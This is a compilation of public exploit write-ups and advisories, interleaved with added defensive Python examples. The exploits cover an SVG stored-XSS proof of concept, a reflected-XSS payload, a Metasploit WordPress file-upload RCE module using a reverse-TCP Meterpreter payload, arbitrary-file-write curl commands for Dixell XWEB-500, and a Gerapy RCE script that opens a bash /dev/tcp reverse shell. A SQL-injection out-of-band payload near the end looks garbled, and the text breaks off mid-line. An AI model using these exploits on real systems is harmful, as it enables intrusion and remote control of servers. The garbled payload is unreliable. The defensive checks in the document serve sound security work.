<pre><code># Exploit Title: Projeqtor v9.3.1 Stored XSS / Privilege Escalation<br /># Exploit Author: Oscar Gutierrez (m4xp0w3r)<br /># Date: January 4, 2021<br /># Vendor Homepage: https://www.projeqtor.org/en/<br /># Software Link: https://www.projeqtor.org/en/product-en/downloads<br /># Tested on: Ubuntu, LAMP<br /># Vendor: Projeqtor<br /># Version: v9.3.1<br /># Exploit Description:<br />Projeqtor version 9.3.1 suffers from a stored XSS vulnerability via SVG file upload. A low-privileged user can upload SVG images that contain malicious JavaScript. When an administrator opens the attachment, the script runs in the administrator's browser and session, so an attacker can escalate privileges and then upload a malicious plugin, which results in arbitrary code execution on the server hosting the application.<br /># Steps to reproduce:<br />Upload the following XML as an SVG file, replacing the xlink:href value with the URL of a script you control. Once an administrator opens the attachment, the JavaScript hosted at that URL is executed in their browser. Note that the script only runs when the SVG is opened directly as a document (for example by following the attachment link); browsers do not execute script in an SVG rendered through an img element.<br /><br /><?xml version="1.0" standalone="no"?><br /><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><br /><br /><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"><br /> <rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" /><br /> <script xlink:href="CHANGE-THIS-TO-THE-URL-OF-YOUR-SCRIPT"></script><br /></svg><br /></code></pre>
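The check an upload handler would need to stop this class of payload, as an added example that is not part of the advisory and not ProjeQtOr code: the SVG is parsed as XML and rejected if it carries a script or foreignObject element, an on* event-handler attribute, a javascript: or data: URL, or an href/xlink:href that points at another origin. MALICIOUS_SVG is the advisory's PoC with the attacker URL replaced by a placeholder host; BENIGN_SVG is a constructed icon.

```python
"""Server-side SVG upload check.

Added example, not part of the original advisory or of ProjeQtOr.
Rejects SVG documents that can run script when opened directly:
<script> and <foreignObject> elements, on* event-handler attributes,
javascript:/data: URLs and href/xlink:href references to other origins.
The attacker URL in MALICIOUS_SVG is a placeholder, not a real host.
"""
import xml.etree.ElementTree as ET
from typing import List

# Constructed test inputs: the advisory's PoC (URL replaced by a placeholder) and a benign icon.
MALICIOUS_SVG = b"""<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
 <rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
 <script xlink:href="https://attacker.invalid/x.js"></script>
</svg>"""

BENIGN_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" width="10" height="10">
 <rect width="10" height="10" fill="blue"/>
</svg>"""

FORBIDDEN_ELEMENTS = {"script", "foreignobject"}


def _local_name(qname: str) -> str:
    """Strip the {namespace} prefix ElementTree puts on tags and attributes."""
    return qname.rsplit("}", 1)[-1].lower()


def svg_violations(data: bytes) -> List[str]:
    """Return the reasons an uploaded SVG must be rejected; an empty list means it is acceptable."""
    try:
        # For untrusted XML in production prefer defusedxml.ElementTree, which also
        # refuses entity-expansion tricks; the checks below are the same either way.
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        return [f"not well-formed XML: {exc}"]
    if _local_name(root.tag) != "svg":
        return ["root element is not <svg>"]

    reasons = []
    for element in root.iter():
        tag = _local_name(element.tag)
        if tag in FORBIDDEN_ELEMENTS:
            reasons.append(f"<{tag}> element")
        for attr, raw in element.attrib.items():
            name = _local_name(attr)
            value = raw.strip().lower()
            if name.startswith("on"):
                reasons.append(f"event handler {name} on <{tag}>")
            elif name == "href":
                scheme = value.split(":", 1)[0]
                if ":" in value and scheme in ("javascript", "data"):
                    reasons.append(f"{scheme}: URL on <{tag}>")
                elif "://" in value or value.startswith("//"):
                    reasons.append(f"external reference on <{tag}>: {raw}")
    return reasons


if __name__ == "__main__":
    for label, doc in (("benign", BENIGN_SVG), ("malicious", MALICIOUS_SVG)):
        print(label, svg_violations(doc) or "accepted")
```

Rejecting on parse is a filter, not a guarantee; the robust fix for attachments that must be viewable is to serve them with Content-Disposition: attachment or from a separate, cookie-less origin, so that any script that does slip through no longer runs in the application's session.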
<pre><code># Exploit Title: [Agirhnet] - Reflected XSS via GET<br /># Google Dork: inurl:agirhnet<br /># Date: 2022-02-21<br /># Exploit Author: Daniel Martinez Adan (aDoN90)<br /># Vendor Homepage: https://agirh.net/<br /># Version: [app version] 1.0<br /># CVSS : 6.1 (AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)<br /><br />URL:<br />https://example.com/AgirhNet/LoadingProgress.aspx?FORM=/%22%0Aconfirm(document.domain)//<br /><br />Vulnerable parameter: FORM<br /><br /><br />Payload: /%22%0Aconfirm(document.domain)//<br /><br />The leading "/" is required: the application only accepts the value when it looks like a URL path. The payload is shaped for reflection inside a JavaScript string: %22 closes the string literal, %0A ends the statement, confirm(document.domain) runs, and // comments out the remainder of the original line.<br /><br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = NormalRanking<br /><br /> prepend Msf::Exploit::Remote::AutoCheck<br /> include Msf::Exploit::FileDropper<br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::Remote::HTTP::Wordpress<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Wordpress Plugin Catch Themes Demo Import RCE',<br /> 'Description' => %q{<br /> The Wordpress Plugin Catch Themes Demo Import versions < 1.8 are vulnerable to authenticated<br /> arbitrary file uploads via the import functionality found in the<br /> ~/inc/CatchThemesDemoImport.php file, due to insufficient file type validation.<br /> Re-exploitation may need a reboot of the server, or to wait an arbitrary timeout.<br /> During testing this timeout was roughly 5min.<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'h00die', # msf module<br /> 'Ron Jost', # edb<br /> 'Thinkland Security Team' # listed on wordfence's site<br /> ],<br /> 'References' => [<br /> [ 'EDB', '50580' ],<br /> [ 'CVE', '2021-39352' ],<br /> [ 'URL', 'https://plugins.trac.wordpress.org/changeset/2617555/catch-themes-demo-import/trunk/inc/CatchThemesDemoImport.php' ],<br /> [ 'URL', 'https://www.wordfence.com/vulnerability-advisories/#CVE-2021-39352' ],<br /> [ 'WPVDB', '781f2ff4-cb94-40d7-96cb-90128daed862' ]<br /> ],<br /> 'Platform' => ['php'],<br /> 'Privileged' => false,<br /> 'Arch' => ARCH_PHP,<br /> 'Targets' => [<br /> [ 'Automatic Target', {}]<br /> ],<br /> # we leave this out as typically php.ini will bail before 350mb, and payloads are small enough to fit as is.<br /> # 'Payload' =><br /> # {<br /> # # https://plugins.trac.wordpress.org/browser/catch-themes-demo-import/tags/1.6.1/inc/CatchThemesDemoImport.php#L226<br /> # 'Space' => 
367_001_600, # 350mb<br /> # }<br /> 'DisclosureDate' => '2021-10-21',<br /> 'DefaultTarget' => 0,<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'php/meterpreter/reverse_tcp'<br /> },<br /> 'Notes' => {<br /> 'Stability' => [ CRASH_SAFE ],<br /> 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],<br /> # https://support.shufflehound.com/forums/topic/i-cant-use-the-one-click-demo-installer/#post-31770<br /> # re-exploitation may need a reboot of the server, or to wait an arbitrary timeout.<br /> 'Reliability' => [ UNRELIABLE_SESSION ]<br /> }<br /> )<br /> )<br /><br /> register_options [<br /> OptString.new('USERNAME', [true, 'Username of the account', 'admin']),<br /> OptString.new('PASSWORD', [true, 'Password of the account', 'admin']),<br /> OptString.new('TARGETURI', [true, 'The base path of the Wordpress server', '/']),<br /> ]<br /> end<br /><br /> def check<br /> return CheckCode::Safe('Wordpress not detected.') unless wordpress_and_online?<br /><br /> checkcode = check_plugin_version_from_readme('catch-themes-demo-import', '1.8')<br /> if checkcode == CheckCode::Safe<br /> print_error('catch-themes-demo-import not a vulnerable version')<br /> end<br /> checkcode<br /> end<br /><br /> def exploit<br /> cookie = wordpress_login(datastore['USERNAME'], datastore['PASSWORD'])<br /><br /> if cookie.nil?<br /> vprint_error('Invalid login, check credentials')<br /> return<br /> end<br /><br /> # grab the ajax_nonce<br /> res = send_request_cgi({<br /> 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'themes.php'),<br /> 'method' => 'GET',<br /> 'cookie' => cookie,<br /> 'keep_cookies' => 'false', # for some reason wordpress gives back an unauth cookie here, so ignore it.<br /> 'vars_get' => {<br /> 'page' => 'catch-themes-demo-import'<br /> }<br /> })<br /> fail_with(Failure::Unreachable, 'Site not responding') unless res<br /> fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200<br /> 
/"ajax_nonce":"(?<ajax_nonce>[a-z0-9]{10})"/ =~ res.body<br /> fail_with(Failure::UnexpectedReply, 'Unable to find ajax_nonce on page') unless ajax_nonce<br /> vprint_status("Ajax Nonce: #{ajax_nonce}")<br /><br /> random_filename = "#{rand_text_alphanumeric(6..12)}.php"<br /> vprint_status("Uploading payload filename: #{random_filename}")<br /><br /> multipart_form = Rex::MIME::Message.new<br /> multipart_form.add_part('ctdi_import_demo_data', nil, nil, 'form-data; name="action"')<br /> multipart_form.add_part(ajax_nonce, nil, nil, 'form-data; name="security"')<br /> multipart_form.add_part('undefined', nil, nil, 'form-data; name="selected"')<br /> multipart_form.add_part(<br /> payload.encoded,<br /> 'application/x-php',<br /> nil,<br /> "form-data; name=\"content_file\"; filename=\"#{random_filename}\""<br /> )<br /><br /> res = send_request_cgi(<br /> 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'admin-ajax.php'),<br /> 'method' => 'POST',<br /> 'cookie' => cookie,<br /> 'keep_cookies' => 'true',<br /> 'ctype' => "multipart/form-data; boundary=#{multipart_form.bound}",<br /> 'data' => multipart_form.to_s<br /> )<br /> fail_with(Failure::Unreachable, 'Site not responding') unless res<br /> fail_with(Failure::UnexpectedReply, 'Plugin not ready to process new payloads. Please retry in a few minutes.') if res.code == 200 && res.body.include?('afterAllImportAJAX')<br /> fail_with(Failure::UnexpectedReply, 'Failed to upload payload') unless res.code == 500<br /> # yes, a 500. We uploaded a malformed item, so when it tries to import it, it fails. This<br /> # is actually positive as it won't display a malformed item anywhere in the UI. 
Simply writes our payload, then exits (non-gracefully)<br /> #<br /> # [Fri Dec 24 16:48:00.904980 2021] [php7:error] [pid 440128] [client 192.168.2.199:38107] PHP Fatal error: Uncaught Error: Class 'XMLReader' not found in /var/www/wordpress/wp-content/plugins/catch-themes-demo-import/vendor/catchthemes/wp-content-importer-v2/src/WXRImporter.php:123<br /> # Stack trace:<br /> # #0 /var/www/wordpress/wp-content/plugins/catch-themes-demo-import/vendor/catchthemes/wp-content-importer-v2/src/WXRImporter.php(331): CatchThemes\\WPContentImporter2\\WXRImporter->get_reader()<br /> # #1 /var/www/wordpress/wp-content/plugins/catch-themes-demo-import/inc/Importer.php(80): CatchThemes\\WPContentImporter2\\WXRImporter->import()<br /> # #2 /var/www/wordpress/wp-content/plugins/catch-themes-demo-import/inc/Importer.php(137): CTDI\\Importer->import()<br /> # #3 /var/www/wordpress/wp-content/plugins/catch-themes-demo-import/inc/CatchThemesDemoImport.php(306): CTDI\\Importer->import_content()<br /> # #4 /var/www/wordpress/wp-includes/class-wp-hook.php(292): CTDI\\CatchThemesDemoImport->import_demo_data_ajax_callback()<br /> # #5 /var/www/wordpress/wp-includes/class-wp-hook.php(316): WP_Hook->apply_filters()<br /> # #6 /var/www/wordpress/wp-includes/plugin.php(484): WP_ in /var/www/wordpress/wp-content/plugins/catch-themes-demo-import/vendor/catchthemes/wp-content-importer-v2/src/WXRImporter.php on line 123<br /> register_file_for_cleanup(random_filename)<br /> month = Date.today.month.to_s.rjust(2, '0')<br /> print_status("Triggering payload at wp-content/uploads/#{Date.today.year}/#{month}/#{random_filename}")<br /> send_request_cgi(<br /> 'uri' => normalize_uri(target_uri.path, 'wp-content', 'uploads', Date.today.year, month, random_filename),<br /> 'method' => 'GET',<br /> 'keep_cookies' => 'true'<br /> )<br /> end<br />end<br /></code></pre>
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022<br />Original source: https://malvuln.com/advisory/1f84a5305b65d7f6aa3afa7e2f2bda0e.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.Agent.baol<br />Vulnerability: Insecure Permissions<br />Description: The malware writes several PE files to the root of the C: drive with insecure permissions, granting Change (C) access to the Authenticated Users group. A standard user can therefore rename the executable dropped by the malware to disable it, or replace it with an executable of their own, and then wait for a privileged user to log on to the infected machine to potentially escalate privileges.<br />Type: PE32<br />MD5: 1f84a5305b65d7f6aa3afa7e2f2bda0e<br />Vuln ID: MVID-2022-0495<br />Disclosure: 02/21/2022<br /><br /><br />Exploit/PoC:<br />C:\>cacls NB_Server.exe<br />C:\NB_Server.exe BUILTIN\Administrators:(ID)F<br /> NT AUTHORITY\SYSTEM:(ID)F<br /> BUILTIN\Users:(ID)R<br /> NT AUTHORITY\Authenticated Users:(ID)C<br /><br /><br />C:\>dir NB_Server.exe<br /> Volume in drive C has no label.<br /><br /> Directory of C:\<br /><br />02/11/2022 02:10 AM 70,411 NB_Server.exe<br /> 1 File(s) 70,411 bytes<br /> 0 Dir(s) 26,507,804,672 bytes free<br /><br />C:\>cacls ds1.exe<br />C:\ds1.exe BUILTIN\Administrators:(ID)F<br /> NT AUTHORITY\SYSTEM:(ID)F<br /> BUILTIN\Users:(ID)R<br /> NT AUTHORITY\Authenticated Users:(ID)C<br /><br />C:\>dir ds1.exe<br /> Volume in drive C has no label.<br /><br /> Directory of C:\<br /><br />02/11/2022 02:10 AM 0 ds1.exe<br /> 1 File(s) 0 bytes<br /> 0 Dir(s) 26,506,407,936 bytes free<br /><br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. 
Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code># Exploit Title: Dixell XWEB-500 - Arbitrary File Write<br /># Google Dork: inurl:"xweb500.cgi"<br /># Date: 03/01/2022<br /># Exploit Author: Roberto Palamaro<br /># Vendor Homepage: https://climate.emerson.com/it-it/shop/1/dixell-electronics-sku-xweb500-evo-it-it<br /># Version: XWEB-500<br /># Tested on: Dixell XWEB-500<br /># References: https://www.swascan.com/vulnerability-report-emerson-dixell-xweb-500-multiple-vulnerabilities/<br /><br /># Emerson Dixell XWEB-500 is affected by multiple arbitrary file write vulnerabilities: three CGI endpoints accept a raw POST body in which the first line is the destination filename and the following line(s) are the content to write.<br /><br /># Endpoint: logo_extra_upload.cgi<br /># The first line of the body is the filename and the second is the content of the file to be written<br /># Write file<br />echo -e "file.extension\ncontent" | curl -A Chrome -kis "http://[target]:[port]/cgi-bin/logo_extra_upload.cgi" -X POST --data-binary @- -H 'Content-Type: application/octet-stream'<br /># Verify: the written file appears in the /logo/ listing<br />curl -A Chrome -is "http://[target]:[port]/logo/"<br /><br /># Endpoint: lo_utils.cgi<br /># ACTION=5 selects write mode; the filename and content follow on the next lines<br />echo -e "ACTION=5\nfile.extension\ncontent" | curl -A Chrome -kis "http://[target]:[port]/cgi-bin/lo_utils.cgi" -X POST --data-binary @- -H 'Content-Type: application/octet-stream'<br /># Verify: ACTION=3 lists the stored resources<br />echo -e "ACTION=3" | curl -A Chrome -kis "http://[target]:[port]/cgi-bin/lo_utils.cgi" -X POST --data-binary @- -H 'Content-Type: application/octet-stream'<br /><br /># Endpoint: cal_save.cgi<br /># The first line of the body is the filename and the second is the content of the file to be written<br />echo -e "file.extension\ncontent" | curl -A Chrome -kis "http://[target]:[port]/cgi-bin/cal_save.cgi" -X POST --data-binary @- -H 'Content-Type: application/octet-stream'<br /># Verify: cal_dir.cgi lists the saved files<br />curl -A Chrome -kis http://[target]:[port]/cgi-bin/cal_dir.cgi<br /></code></pre>
<pre><code>On February 15, 2022, the Wordfence Threat Intelligence team responsibly disclosed a reflected Cross-Site Scripting (XSS) vulnerability in Header Footer Code Manager, a WordPress plugin with over 300,000 installations.<br /><br />The plugin publisher quickly acknowledged our initial contact and we sent the full disclosure details the same day, on February 15, 2022. A patched version, 1.1.17, was implemented a few days later and made available on February 18, 2022.<br /><br />Wordfence Premium, Wordfence Care, and Wordfence Response customers received a firewall rule to protect against this vulnerability on February 15, 2022. Sites still running the free version of Wordfence are partially protected against this exploit by our built-in XSS rule, but will receive full protection 30 days later, on March 17, 2022.<br /><br />Description: Reflected Cross-Site Scripting<br /><br />Affected Plugin: Header Footer Code Manager<br /><br />Plugin Slug: header-footer-code-manager<br /><br />Plugin Developer: 99robots<br /><br />Affected Versions: <= 1.1.16<br /><br />CVE ID: CVE-2022-0710<br /><br />CVSS Score: 6.1 (Medium)<br /><br />CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N<br /><br />Researcher/s: Ramuel Gall<br /><br />Fully Patched Version: 1.1.17<br /><br />Header Footer Code Manager is a WordPress plugin designed to allow administrators to add code snippets to the header or footer of a website. One of the admin panel pages added by the plugin allows administrators to view a list of the code snippets that have been added to the site, including links to edit or delete each snippet. The plugin's column_name function used the $_REQUEST['page'] parameter to construct these links.<br /><br />WordPress uses the value of the $_GET['page'] parameter to determine which admin page the user is currently visiting, and blocks users who are not allowed to access the page named in $_GET['page']. This means that $_REQUEST['page'] might be expected to contain only the slug of the admin page that displays the list of code snippets, hfcm-list. However, because of how PHP populates its superglobals, $_REQUEST parameters can be overloaded.<br /><br />PHP populates the $_REQUEST superglobal from $_GET, $_POST, and $_COOKIE. Normally, if a $_GET['page'] parameter is sent, $_REQUEST['page'] is populated with the value of $_GET['page']. In most PHP configurations, however, the request_order setting (or variables_order, if request_order is not set) lists POST after GET, and later sources overwrite earlier ones, so if a request carries both a $_GET['page'] parameter and a $_POST['page'] parameter, $_REQUEST['page'] ends up set to the value of $_POST['page'].<br /><br />The upshot is that this can be used to execute JavaScript in the browser of a logged-in administrator, for instance by tricking them into visiting a self-submitting form that sends a POST request to e.g. hxxps://victimsite.site/wp-admin/admin.php?page=hfcm-list with the $_POST['page'] parameter set to malicious JavaScript.<br /><br />The $_GET['page'] parameter means that WordPress routes the victim to the correct page, and then the value of $_REQUEST['page'] (which in nearly all configurations will be the value of $_POST['page']) is echoed out onto the page without escaping.<br /><br />Most XSS can be used to perform actions using an administrator's session, which includes the ability to create malicious administrators and in some cases add backdoors. 
Additionally, this particular plugin is used to add code to a site, so an attacker could also potentially leverage reflected XSS into stored XSS to attack site visitors, even on sites where file editing and user creation functionality was locked down.<br /><br />Timeline<br /><br />February 15, 2022 - The Wordfence Threat Intelligence team finishes our investigation and releases a firewall rule to Wordfence Premium, Care, and Response users to protect against any exploits targeting this vulnerability. We initiate the responsible disclosure process and receive a response from the plugin’s developers. We send over full disclosure.<br /><br />February 17, 2022 - Plugin changelog shows the issue is fixed.<br /><br />February 18, 2022 - A patched version of the plugin, 1.1.17, is released on the WordPress repo.<br /><br />March 17, 2022 - The firewall rule becomes available to free Wordfence users.<br /><br />Conclusion<br /><br />In today’s article, we discussed a reflected XSS vulnerability in Header Footer Code Manager. While this would require tricking an administrator into clicking a link or performing some other action, it still offers the potential for site takeover. As such we urge you to update to the latest version of this plugin, 1.1.17 as of this writing, as soon as possible.<br /><br /></code></pre>
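The $_REQUEST merge described above, turned into a detection you can run over request records, as an added example that is not from the Wordfence advisory or from the plugin. php_request reproduces PHP's merge for the G and P sources under a given request_order (the shipped php.ini uses "GP"; with request_order unset, variables_order "EGPCS" applies, which also puts POST after GET), and find_overloads flags any request where the same key appears in both the query string and the POST body with different values, the fingerprint of this attack. SAMPLE_REQUESTS is constructed traffic.

```python
"""Flag requests that overload a $_REQUEST parameter via the POST body.

Added example; not from the Wordfence advisory or the plugin. PHP builds
$_REQUEST by merging the sources listed in request_order (the shipped php.ini
uses "GP"; with request_order unset, variables_order "EGPCS" applies), and
each later source overwrites earlier ones, so a POST value hides the GET
value WordPress routed on. The same parameter present in both the query
string and the body with different values is the fingerprint of the attack.
"""
from typing import Dict, List, Tuple
from urllib.parse import parse_qs, urlsplit

# Constructed request records (method, request-URI, body); not real traffic.
SAMPLE_REQUESTS = [
    ("GET", "/wp-admin/admin.php?page=hfcm-list", ""),
    ("POST", "/wp-admin/admin.php?page=hfcm-list", "page=hfcm-list&paged=2"),
    ("POST", "/wp-admin/admin.php?page=hfcm-list",
     "page=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E"),
]


def _params(qs: str) -> Dict[str, str]:
    """Decode a query/body string, keeping the last value per key as PHP does for scalar keys."""
    return {k: v[-1] for k, v in parse_qs(qs, keep_blank_values=True).items()}


def php_request(query: Dict[str, str], post: Dict[str, str], request_order: str = "GP") -> Dict[str, str]:
    """Reproduce PHP's $_REQUEST merge for the G and P sources (cookies omitted)."""
    sources = {"G": query, "P": post}
    merged: Dict[str, str] = {}
    for letter in request_order.upper():
        merged.update(sources.get(letter, {}))  # later letters overwrite earlier ones
    return merged


def find_overloads(requests, request_order: str = "GP") -> List[Tuple[int, str, str, str]]:
    """Return (index, key, query value, effective $_REQUEST value) for every shadowed parameter."""
    hits = []
    for i, (method, uri, body) in enumerate(requests):
        query = _params(urlsplit(uri).query)
        post = _params(body) if method.upper() == "POST" else {}
        effective = php_request(query, post, request_order)
        for key, qval in query.items():
            if key in post and post[key] != qval:
                hits.append((i, key, qval, effective[key]))
    return hits


if __name__ == "__main__":
    for idx, key, qval, eff in find_overloads(SAMPLE_REQUESTS):
        print(f"request #{idx}: ${key} routed as {qval!r} but $_REQUEST sees {eff!r}")
```

Only the third record is reported: the second one repeats the routed value in the body, which is harmless. The same logic applied to a WAF or access log with bodies gives a low-noise rule for any plugin that reads a routing parameter from $_REQUEST instead of $_GET.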
<pre><code># Exploit Title: Gerapy 0.9.7 - Remote Code Execution (RCE) (Authenticated)<br /># Date: 03/01/2022<br /># Exploit Author: Jeremiasz Pluta<br /># Vendor Homepage: https://github.com/Gerapy/Gerapy<br /># Version: All versions of Gerapy prior to 0.9.8<br /># CVE: CVE-2021-43857<br /># Tested on: Gerapy 0.9.6<br /><br /># Vulnerability: Gerapy prior to version 0.9.8 is vulnerable to authenticated remote code execution. The spider name posted to a project's /parse endpoint ends up in a shell command, so a name containing backtick command substitution runs arbitrary commands on the host. This issue is patched in version 0.9.8.<br /><br />#!/usr/bin/python<br />import argparse<br />import json<br />import subprocess<br />import sys<br />import time<br /><br />import pyfiglet<br />import requests<br /><br />banner = pyfiglet.figlet_format("CVE-2021-43857")<br />print(banner)<br />print('Exploit for CVE-2021-43857')<br />print('For: Gerapy < 0.9.8')<br /><br />login = "admin"     # CHANGE ME IF NEEDED<br />password = "admin"  # CHANGE ME IF NEEDED<br /><br /><br />class Exploit:<br /><br />    def __init__(self, target_ip, target_port, localhost, localport):<br />        self.target_ip = target_ip<br />        self.target_port = target_port<br />        self.localhost = localhost<br />        self.localport = localport<br />        self.url = "http://" + target_ip + ":" + target_port<br /><br />    def exploitation(self):<br />        # The spider name is interpolated into a shell command on the server, so the<br />        # backtick substitution spawns a bash reverse shell back to our listener.<br />        payload = json.dumps({"spider": "`/bin/bash -c 'bash -i >& /dev/tcp/" + self.localhost + "/" + self.localport + " 0>&1'`"})<br /><br />        # Login to the app (getting auth token)<br />        s = requests.Session()<br />        print("[*] Resolving URL...")<br />        s.get(self.url)<br />        time.sleep(3)<br />        print("[*] Logging in to application...")<br />        r2 = s.post(self.url + "/api/user/auth", json={"username": login, "password": password}, allow_redirects=True)<br />        time.sleep(3)<br />        if r2.status_code == 200:<br />            print('[*] Login successful! Proceeding...')<br />        else:<br />            print('[!] Something went wrong! Check the credentials.')<br />            sys.exit(1)<br /><br />        # Build the Authorization header from the token in the JSON response<br />        auth_token = {'Authorization': 'Token ' + r2.json()['token']}<br /><br />        # Get the project list<br />        print("[*] Getting the project list")<br />        r3 = s.get(self.url + "/api/project/index", headers=auth_token, allow_redirects=True)<br />        time.sleep(3)<br />        if r3.status_code != 200:<br />            print("[!] Something went wrong! Maybe the token is corrupted?")<br />            sys.exit(1)<br /><br />        # The response is a JSON list such as [{"name": "test"}]; use the first project<br />        projects = r3.json()<br />        if not projects:<br />            print("[!] No projects found; the parse endpoint needs an existing project")<br />            sys.exit(1)<br />        name = projects[0]['name']<br />        print("[*] Found project: " + name)<br /><br />        # Resolve the project's numeric id (needed for the parse URL) via the build endpoint<br />        print("[*] Getting the ID of the project to build the URL")<br />        r4 = s.get(self.url + "/api/project/" + name + "/build", headers=auth_token, allow_redirects=True)<br />        time.sleep(3)<br />        if r4.status_code != 200:<br />            print("[!] Something went wrong! I can't reach the found project!")<br />            sys.exit(1)<br />        project_id = r4.json()['id']<br />        print("[*] Found ID of the project: ", project_id)<br />        time.sleep(1)<br /><br />        # netcat listener for the reverse shell<br />        print("[*] Setting up a netcat listener")<br />        listener = subprocess.Popen(["nc", "-nvlp", self.localport])<br />        time.sleep(3)<br /><br />        # Trigger the injection; the request may not return until the reverse shell closes<br />        print("[*] Executing reverse shell payload")<br />        print("[*] Watch out for the shell! :)")<br />        r5 = s.post(self.url + "/api/project/" + str(project_id) + "/parse", data=payload, headers=auth_token, allow_redirects=True)<br /><br />        if r5.status_code == 200:<br />            print("[*] It worked!")<br />            listener.wait()<br />        else:<br />            print("[!] Something went wrong!")<br />            listener.terminate()<br /><br /><br />def get_args():<br />    parser = argparse.ArgumentParser(description='Gerapy < 0.9.8 - Remote Code Execution (RCE) (Authenticated)')<br />    parser.add_argument('-t', '--target', dest="target_ip", required=True, action='store', help='Target IP')<br />    parser.add_argument('-p', '--port', dest="target_port", required=True, action='store', help='Target port')<br />    parser.add_argument('-L', '--lh', dest="localhost", required=True, action='store', help='Listening IP')<br />    parser.add_argument('-P', '--lp', dest="localport", required=True, action='store', help='Listening port')<br />    return parser.parse_args()<br /><br /><br />if __name__ == "__main__":<br />    args = get_args()<br />    exp = Exploit(args.target_ip, args.target_port, args.localhost, args.localport)<br />    exp.exploitation()<br /></code></pre>
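The pattern the payload above relies on, beside its fix, as an added example: this is not Gerapy's code, and the page does not show how Gerapy invokes the spider, so the vulnerable function below is a stand-in that reproduces the mechanism (a request-supplied name spliced into a shell command line, where backticks or $(...) are expanded before the tool runs). The hardened version allow-lists the name and execs an argv list with no shell. "echo" stands in for the real tool so the block is harmless and runs offline.

```python
"""Command injection through a spider name: the vulnerable pattern and its fix.

Added example; this is not Gerapy's code and the page does not show how Gerapy
invokes the spider. It reproduces the pattern the CVE-2021-43857 payload
relies on: a name taken from the request is spliced into a shell command line,
so backtick substitution (or $(...)) runs whatever the caller supplied. "echo"
stands in for the real tool so the example is harmless and runs offline.
"""
import re
import subprocess
from typing import List

TOOL = "echo"  # stand-in for the real command the name would be passed to
SPIDER_NAME_RE = re.compile(r"[A-Za-z0-9_.-]{1,64}")


def run_vulnerable(spider: str) -> str:
    """Builds a shell string; the shell expands backticks before the tool ever sees the name."""
    result = subprocess.run(f"{TOOL} {spider}", shell=True, capture_output=True, text=True)
    return result.stdout.strip()


def validate_spider_name(spider: str) -> str:
    """Allow-list check: reject anything that is not a plain identifier."""
    if not SPIDER_NAME_RE.fullmatch(spider):
        raise ValueError(f"invalid spider name: {spider!r}")
    return spider


def build_argv(spider: str) -> List[str]:
    """argv list for exec without a shell; the name is one argument and is never parsed."""
    return [TOOL, validate_spider_name(spider)]


def run_hardened(spider: str) -> str:
    """Same operation with shell=False and a validated name; metacharacters are inert."""
    result = subprocess.run(build_argv(spider), capture_output=True, text=True)
    return result.stdout.strip()


if __name__ == "__main__":
    injected = "`printf INJECTED`"
    print("vulnerable:", run_vulnerable(injected))  # the substitution ran
    try:
        run_hardened(injected)
    except ValueError as exc:
        print("hardened:", exc)
```

Passing an argv list is what removes the bug; the allow-list is defence in depth, since the tool itself may interpret a leading "-" or other characters in the name. shlex.quote is an acceptable fallback only where a shell string is unavoidable.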
<pre><code>## Title: Air Cargo Management System v1.0 remote SQL-Injections<br />## Author: nu11secur1ty<br />## Date: 02.18.2022<br />## Vendor: https://www.sourcecodester.com/users/tips23<br />## Software: https://www.sourcecodester.com/php/15188/air-cargo-management-system-php-oop-free-source-code.html<br />## CVE - Air Cargo Management System v1.0<br /><br /><br />## Description:<br />The `ref_code` parameter of Air Cargo Management System v1.0 (the<br />p=trace page) is vulnerable to SQL injection.<br />The payload '+(select<br />load_file('\\\\c5idmpdvfkqycmiqwv299ljz1q7jvej5mtdg44t.https://www.sourcecodester.com/php/15188/air-cargo-management-system-php-oop-free-source-code.html\\hag'))+'<br />was submitted in the ref_code parameter.<br />This payload injects a SQL sub-query that calls MySQL's load_file<br />function with a UNC file path that references a host on an external<br />domain.<br />The application interacted with that domain, indicating that the<br />injected SQL query was executed by the database server.<br />WARNING: because the lookup is made by the database server itself, pointing<br />the UNC path at an external domain, a redirecting subdomain or an internal<br />host is extremely dangerous!<br />Status: CRITICAL<br /><br /><br />[+] 